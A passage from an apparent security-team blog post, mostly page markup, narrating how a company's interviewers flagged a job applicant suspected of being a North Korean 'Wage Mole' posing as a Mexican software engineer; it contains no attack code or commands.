pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Last time we saw a Chollima was in March, when he tried to hack me using one of the <a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/">most creative malwares I&#8217;ve seen lately</a>.</strong></p><p>He failed. We tricked him into joining a meet with me, <a href="https://quetzal.bitso.com/p/interview-with-the-chollima">and he was mocked and recorded</a>.</p><p>We knew it was only a matter of time before they sent a bigger, meaner Chollima back looking for payback.</p><p>But there&#8217;s something worse than a big, bad Chollima.</p><p><strong>And that&#8217;s two Chollimas.</strong></p><div><hr></div><h2>Intro: Hack-A-Mole</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UAR1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UAR1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UAR1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic" width="411" height="411" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:411,&quot;bytes&quot;:321146,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UAR1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!UAR1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff137c6d-9b71-4e9a-9ee9-cc8e850064da_1024x1024.heic 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You may think the <strong>Lazarus</strong> guys have it hard. Long working hours, a buggy boss who wants to nuke the world from time to time, some weirdos from the <strong>Quetzal Team</strong> calling you names like <em>wet wipe</em> or <em>muppet</em>, hurting your little <em>nuky</em> feelings. So far away is that dream life of being a government hacker superstar, working under the guise of evil cyber geniuses.</p><p>But there&#8217;s someone who has it worse. North Koreans who actually have to work for real. And I don&#8217;t mean those working in the everyday North Korean economy, I mean those <strong>Lazarus</strong> guys who actually have to hold a legit job. With a real boss. Real KPIs. Hiding from HR meetings you can&#8217;t really fake your way through, and offsites that&#8230; well, let&#8217;s say your passport might not be <em>super cooperative</em> about those.</p><p>These guys actually work 9 to 5 for a salary that ultimately goes to the regime. But they&#8217;re not <em>victims</em>. While doing so, they&#8217;ll take every single opportunity to conduct corporate espionage, and maybe even steal your funds.</p><p>These guys are the <strong><a href="https://www.crowdstrike.com/adversaries/famous-chollima/">Famous Chollima</a></strong> division. But I&#8217;ve fallen in love with a name that takes away the glamour and fits them better:</p><p><strong>Wage Mole</strong>(s). </p><div><hr></div><h2>The first interview: <em>My name i-is Jo-Jos&#233;</em></h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2gLR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2gLR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2gLR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png" width="411" height="411" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:411,&quot;bytes&quot;:1979558,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2gLR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!2gLR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95f69db6-bb49-4067-ac01-1e98488fc804_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I first heard of &#8220;Jos&#233;&#8221; the Mole after he applied for a Senior Software Engineer position at Bitso, and one of our Technical Interviewers raised an early warning, flagging the interview as suspicious.</p><p>Jos&#233; introduced himself as someone from <strong>Mexico</strong>, who had studied for five years at the <strong>University of Guadalajara</strong> and had <strong>over ten years in the market</strong>, working for a big pharma company, implementing HIPAA compliance from scratch, and basically acing everything related to Java, Spring Boot, and all the wizardry devs do.</p><p>But something didn&#8217;t quite add up.</p><blockquote><p>&#8220;His English was good, but his Spanish, we can say, was &#8216;intermediate&#8217;.</p><p>There were lots of connection drops, he was having network issues.</p><p>He was an Asian-looking man.&#8221;</p><p>&#8212; Talent Acquisition Analyst</p></blockquote><p>So, you lived in Mexico for years, studied a technical degree, worked over a decade in a Spanish-speaking country&#8230; and yet, your Spanish is just <em>so-so</em>?</p><p>We kept an eye on him. He was allowed to move forward with an async exercise as part of the interview process.</p><p>The longer he stayed in the loop, the better for everyone.</p><p>If he was genuinely applying, he&#8217;d eventually complete the process.</p><p>If he wasn&#8217;t&#8230; well, we&#8217;d keep him in the &#8220;process&#8221; <em>for the intel</em>.</p><div><hr></div><h2>The exercise: <code>IllegalMoleException</code></h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1Hnh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1Hnh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1Hnh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png" width="410" height="410" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:410,&quot;bytes&quot;:2076796,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1Hnh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!1Hnh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4f3a673-9c39-40e8-b645-6635ad4eb550_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The exercise was graded at 51%. For someone with that level of experience, completing an asynchronous coding challenge with such a result was more than suspicious.</p><p>The technical interviewers were asked if there was still interest in moving forward.</p><p>They all agreed, not because of his potential, but because it was a good chance to study the subject more closely. </p><p>So we advanced to a monitored live-programming session. </p><div><hr></div><h2>The second interview: <em>The cat is under the table</em></h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UoSK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UoSK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UoSK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png" width="410" height="410" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:410,&quot;bytes&quot;:2242305,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UoSK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!UoSK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1344fd19-45a2-4603-ac66-3dbdba82532c_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>&#8220;Jos&#233;&#8221; joined the second round and that&#8217;s when things got even weirder. </p><blockquote><p>&#8220;He doesn&#8217;t speak Spanish at all, and his English is <em>barely</em> passable, which doesn&#8217;t match his r&#233;sum&#233; or his years of experience.</p><p>He took at least 10 minutes just to log into the collaborative coding platform, which was literally a link emailed to him, nothing complex.</p><p>I onboarded a second interviewer just to double-check I wasn&#8217;t being biased, but she thought the same.</p><p>When asked for feedback or follow-up questions, the candidate simply replied: <em>&#8216;What are your ongoing projects?&#8217;</em>, which I obviously dismissed.</p><p>He barely speaks, and when he does, it&#8217;s muttering something we can&#8217;t even understand.&#8221;</p><p>&#8212; Technical Interviewers</p></blockquote><p>What happened here? Did Jos&#233; just take a hit to his <a href="https://en.wikipedia.org/wiki/Broca%27s_area">Broca&#8217;s area</a> and was now unable to speak English as he used to?</p><p>Was he simply having a shy day, or did the nerves get the best of him, making him forget his mother tongue? </p><blockquote><p><em>&#8220;All of this is very weird. The interviewee disappears for minutes and doesn&#8217;t respond to emails right away.</em></p><p><em>He started off ok, but added a lot of fluff in certain classes and gave odd explanations when questioned.</em></p><p><em>He&#8217;s stuck writing mapping code instead of advancing through the exercise.</em></p><p><em>I believe he may be writing the test <strong>for someone else</strong>.&#8221;</em></p><p>&#8212; Technical Interviewer Notes</p></blockquote><p>Or maybe, just <em>maybe</em>&#8230;<strong> this wasn&#8217;t Jos&#233;</strong>.</p><div><hr></div><h2>The backstage: Wage Moles</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OKbC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OKbC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!OKbC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!OKbC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!OKbC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OKbC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png" width="412" height="412" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/afd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:412,&quot;bytes&quot;:1833137,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OKbC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 424w, 